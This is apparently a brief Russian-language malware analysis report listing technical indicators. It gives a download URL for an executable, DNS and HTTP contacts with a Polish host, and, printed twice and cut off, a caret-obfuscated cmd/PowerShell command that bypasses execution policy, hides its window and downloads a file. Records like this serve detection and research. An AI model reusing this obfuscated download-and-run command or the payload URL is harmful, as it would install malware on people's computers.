Техническая информация
- http://sklep.ppawlus.cba.pl/bonpaac/templates/4funrjxb/pzchyeaq.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowER^sHeLL^.exe^ ^-E^x^eCUTIOnpOlI^c^y B^YPa^s^S^ ^-^n^OP^R^of^Il^E^ -^W^IN^d^owST^yLe^ ^HIdD^eN ^(N^Ew-^Ob^j^e^c^t sysTE^m.^NEt.WEB^cLIE^NT)^.DoWNLoad^f^I^LE('http://sklep....
- %APPDATA%.exe
- 'sk###.#pawlus.cba.pl':80
- http://sk###.#pawlus.cba.pl/bonpaac/templates/4fUNrJXb/pzcHYeAq.exe
- DNS ASK sk###.#pawlus.cba.pl
- '<SYSTEM32>\cmd.exe' /c "PowER^sHeLL^.exe^ ^-E^x^eCUTIOnpOlI^c^y B^YPa^s^S^ ^-^n^OP^R^of^Il^E^ -^W^IN^d^owST^yLe^ ^HIdD^eN ^(N^Ew-^Ob^j^e^c^t sysTE^m.^NEt.WEB^cLIE^NT)^.DoWNLoad^f^I^LE('http://sklep....' (со скрытым окном)